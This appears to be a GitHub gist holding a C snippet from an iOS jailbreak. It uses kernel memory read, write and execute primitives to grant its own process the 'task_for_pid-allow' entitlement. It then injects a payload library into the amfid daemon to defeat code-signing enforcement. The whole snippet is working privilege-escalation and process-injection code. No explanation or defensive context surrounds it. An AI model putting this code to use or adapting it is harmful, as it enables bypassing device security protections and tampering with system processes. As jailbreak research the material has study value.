amfid_payload w/ task_for_pid-allow patch
| { | |
| COPY_RESOURCE("amfid_payload.dylib", "/jb/amfid_payload.dylib"); | |
| inject_trust("/jb/amfid_payload.dylib"); | |
| uint32_t amfid_pid = get_pid_for_name("amfid"); | |
| uint64_t osbool_val = rk64(offs.data.osboolean_true + kernel_slide); | |
| VAL_CHECK(osbool_val); | |
| uint64_t our_ucred = rk64(myproc + 0x100); | |
| VAL_CHECK(our_ucred); | |
| uint64_t our_cr_label = rk64(our_ucred + 0x78); | |
| VAL_CHECK(our_cr_label); | |
| uint64_t our_ents = rk64(our_cr_label + 0x8); | |
| VAL_CHECK(our_ents); | |
| uint64_t OSDictionary_vtab = rk64(our_ents); | |
| VAL_CHECK(OSDictionary_vtab); | |
| // OSDictionary::SetObject = vtable->0xf8 | |
| uint64_t OSDictionary_SetItem = rk64(OSDictionary_vtab + 0xf8); | |
| VAL_CHECK(OSDictionary_SetItem); | |
| const char *str_to_patch = "task_for_pid-allow"; | |
| int str_len = strlen(str_to_patch) + 1; | |
| uint64_t str_alloc = kalloc(str_len); | |
| kwrite(str_alloc, (void *)str_to_patch, str_len); | |
| LOG("str_alloc: %llx", str_alloc); | |
| // kexecute automatically adds kernel_slide, however this vtab entry is already slid | |
| LOG("OSDict::SetItem return: %llx", kexecute(OSDictionary_SetItem - kernel_slide, 3, our_ents, str_alloc, osbool_val)); | |
| kfree(str_alloc, str_len); | |
| ret = inject_library(amfid_pid, "/jb/amfid_payload.dylib"); | |
| if (ret != KERN_SUCCESS) | |
| { | |
| LOG("failed to inject amfid payload"); | |
| goto out; | |
| } | |
| LOG("amfid patched?!"); | |
| int tries = 0; | |
| while (access("/var/tmp/amfid.alive", F_OK) != 0 && tries < 100) | |
| { | |
| LOG("waiting for amfid..."); | |
| usleep(500000); | |
| tries++; | |
| } | |
| if (tries >= 100) | |
| { | |
| LOG("failed to patch amfid :("); | |
| ret = KERN_FAILURE; | |
| goto out; | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment